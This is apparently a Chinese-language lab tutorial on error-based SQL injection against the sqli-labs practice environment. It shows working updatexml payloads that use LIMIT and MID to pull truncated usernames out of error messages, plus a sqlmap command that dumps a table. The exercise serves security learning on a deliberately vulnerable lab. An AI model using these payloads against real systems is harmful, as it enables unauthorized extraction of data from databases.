介绍
在sql注入中使用 updatexml extractvalue exp floor函数进行报错注入时,有时会出现由于数据的数量过多导致无法一次性显示所有内容,所以鄙人就去寻找了几种解决方法
实验环境
本次实验使用的是github上开源的sqli-labs训练靶场
地址:https://github.com/Audi-1/sqli-labs
解决方法
这里用的是sqli-labs中的第六关Double Query
0x01
首先,用正常的报错注入语句直接查看username
'" and updatexml(1,concat(0x7e,(select group_concat(username)from users),0x7e),1)--+
可以发现由于数据过多的原因,结尾的~并没有显示出来
0x02 方法一(利用limit子句)
limit子句用于限制查询结果返回的数量,常用于分页查询
'" and updatexml(1,concat(0x7e,(select username from users limit 0,1),0x7e),1)--+
limit子句含有两个参数,第一个参数表示从第几行数据开始查,第二个参数表示查几条数据
例如:limit 1,2 表示从第二行开始取两条数据
可以看到两边的双引号都正常的显示出来,即为一个完整的数据
想要获取后面的数据只需要改变limit中第一个参数即可
要注意的是group_concat和limit不能同时使用
0x02 方法二(使用mid函数)
MID 函数用于从文本字段中提取字符。
mid()函数语法如下
SELECT MID(column_name,start[,length]) FROM table_name
其中第一个参数是要提取的表名,第二个参数为起始位置,第三个参数为返回的字符个数
'" and updatexml(1,concat(0x7e,mid((select group_concat(username) from users),1,31),0x7e),1)--+
'" and updatexml(1,concat(0x7e,mid((select group_concat(username) from users),32,31),0x7e),1)--+
'" and updatexml(1,concat(0x7e,mid((select group_concat(username) from users),63,31),0x7e),1)--+
从上面的几个图片中看出,我们可以利用mid()函数截取多次从而获取完整的数据,知道结尾的~显示出来
注入出完整的username如下:Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
我们进入数据库查看一下
发现和我们查出的username完全相同
0x03 方法三(sqlmap O(∩_∩)O)
最简单的方法,直接用sqlmap扫
sqlmap -u 'http://192.168.58.141/sqli-labs/Less-6/?id=1' -D security -T users -C username --dump
下面为扫出的结果
虽然使用sqlmap很简单而且方便,但是鄙人想说一句,在学习的过程中还是通过手注多积累一些比较好